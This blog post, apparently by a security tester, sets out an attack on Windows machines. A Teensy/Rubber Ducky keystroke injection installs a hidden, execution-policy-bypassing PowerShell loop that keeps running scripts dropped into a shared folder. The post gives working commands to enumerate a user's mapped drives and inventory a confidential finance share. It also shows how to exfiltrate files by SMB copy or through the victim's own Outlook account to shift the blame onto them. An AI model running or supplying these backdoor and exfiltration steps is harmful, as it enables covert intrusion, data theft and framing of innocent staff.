The Hidden PP Attack – A Non-Administrative Remote Shell For Data Exfiltration

Powershell to exploit systems is now being used fairly heavily but does frequently rely on administrative access to perform anything of value. To briefly address the different remote connections to new users we have:

  • Backdoors – The computer has an open port in which someone can connect to at any point in time.
  • Reverse Shell –  The computer attempts to connect back to the attacking machine. This is frequently used to bypass firewall filtering.

Unfortunately, control of sockets within Powershell is restricted to administrative users only. This results in us being unable to create any of these types of connectivity. This leaves me in a predicament. I gave myself a challenge:

How can I get data out of a Shared Folder without actually resorting to external tool sets like Kali to do it for me?

As it so happens I came up with a solution which in fairness did involve the use of a Teensy for the initial payload, however, after the HID attack everything is done using Powershell and file shares. The principal is to have the user collect scripts from a shared repository and execute them blindly and hidden from sight. We can then basically perform actions as the user from their own terminal as opposed to ours.

Since it involved an HID attack and in turn creates a Powershell Payload delivery framework….. I have since named this attack…. “The HIDden PP Attack”. I’m hoping this name gets around as I still find it highly amusing hearing it out loud when talking about it being the childish 30 something year old that I am.

Files and scripts are available at the GitHub repo here

Phase 1 – Prepping the repository

Firstly I needed to find an area on a shared folder where everyone had access to create and modify files. This will be used to inject your PoSh code into the PS1 files generated after the HID attack phase is launched. For this example ill use \\server1\sharedarea\Public\PPAttack . Your files to inject code will be visible to everyone so you’d need to disguise it somehow deep in the directory structures.

Phase 2 – Prepping the initial payload

Now we need to get Powershell on a local asset to check in and collect their payloads on a set time frame. To do this we use the following script. This is essentially a one line, but for the purposes of explaining we will look at it in its original form:

if((test-path $full) -eq $False){
    echo ''>$full
    powershell -windowstyle hidden -executionpolicy bypass $full;
    echo ''>$full;
    start-sleep -s 5;

Now the first line is obviously the location of your repository for PS1 scripts. Lines 2-6 has the machine check if a PS1 file exists for itself and if it doesn’t, creates it. The Do loop the performs a check every X seconds to run the contents of the file in a hidden Powershell window. X is set in this script to 5 seconds. Evidently you might want to up this to a minute or 2 depending on your preference.

After all of this is shortened to one line we have:

$repoLocation=’\\server1\SharedArea\Public\PPAttack’;$machine=hostname;$full=$repoLocation+'\'+$machine+'.ps1';if((test-path $full) -eq $False){echo ''>$full}do{powershell -windowstyle hidden -executionpolicy bypass $full;echo ''>$full;start-sleep -s 5;}while(1)

Now we need to run this on the victims desktop. Since I want to get to the Financial folders ill need to attack a financial machine. Using a Teensy/Rubbery Ducky HID attack, we can run this Powershell one liner very quickly.

So the User now has a hidden Powershell script checking and running the file located under the shared area and running it indiscriminately. We essentially have backdoored the system.

Additionally it may be possible to execute this in a VBA macro attack vector which ill look into later.

Phase 3 – Enumeration of Files and Folders

Now we have the ability to use Powershell to query anything we want on the target system. Better than that. We now have access to EVERYTHING that that particular user has access to. So we can first fire up their PS1 file in the shared area and insert our code we want to run:

Get-WmiObject Win32_MappedLogicalDisk -computer <computername> | select name, providername > \\server1\SharedArea\Public\PPAttack\folderList.txt

When the script runs we will get a list of the mapped drives this user has on their asset. It will look like this:

name providername
---- ------------
H:   \\ServerShare\SharedArea\Confidential\Finance

We now know the location of the finance share! We still cant access this directly from our machine so now we can get that user to inventory the shared area so we can pick what looks interesting:

get-childitem "\\servershare\sharedarea\confidential\finance" -recurse | export-csv  \\server1\SharedArea\Public\PPAttack\fileList.csv

Give that one several minutes as it’s a lot of data to process. Open up our CSV in our repository and we have inventoried the entire contens of the folder. We can now pick and choose what files we want to retrieve.

Phase 4 – Data Exfiltration

We now have the file contents of the confidential internal directory. All we need is to exfil the files. Now a simple xcopy/copy-items of the files to a location of your choosing could take place. This is fairly straightforward and would just require you to send the relevant copy commands. Dump it to a USB disk and walk out.

Exfil via SMB copy:

Copy-item -path \\ServerShare\SharedArea\Confidential\Finance\Sensitive_Document.doc -destination \\server1\SharedArea\Public\PPAttack\

For the sake of creativity though why not exfil your documents using the users own email account! What better way to cover your tracks than to make it look like they did it!
Exfil a file through Email

Exfil Via Outlook Attachment:

Add-Type -Assembly 'Microsoft.Office.Interop.Outlook' -PassThru;
$Outlook = New-Object -ComObject Outlook.Application;
$Mail = $Outlook.CreateItem(0);
$Mail.Subject='Here it is';
$Mail.Body = 'Here is the data we discussed';

This will remain in the users sent items though.

So in summary… it is possible to access areas of a network previously inaccessible and also exfil sensitive data. Lessons to be learnt from this type of attack is that AT NO POINT during this attack did I ever have to conduct privilege escalation or crack a user password. It took about 3 seconds at an unlocked machine. No administrative access was required at any time, no elevated prompts etc. Sensitive data was lost as a result.

Please leave comments below. Id love to hear feedback and ideas to build on this and maybe kick it up a notch to the next level. Additionally this attack can be used for spear phishing which ill cover later on.

One thought on “The Hidden PP Attack – A Non-Administrative Remote Shell For Data Exfiltration

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s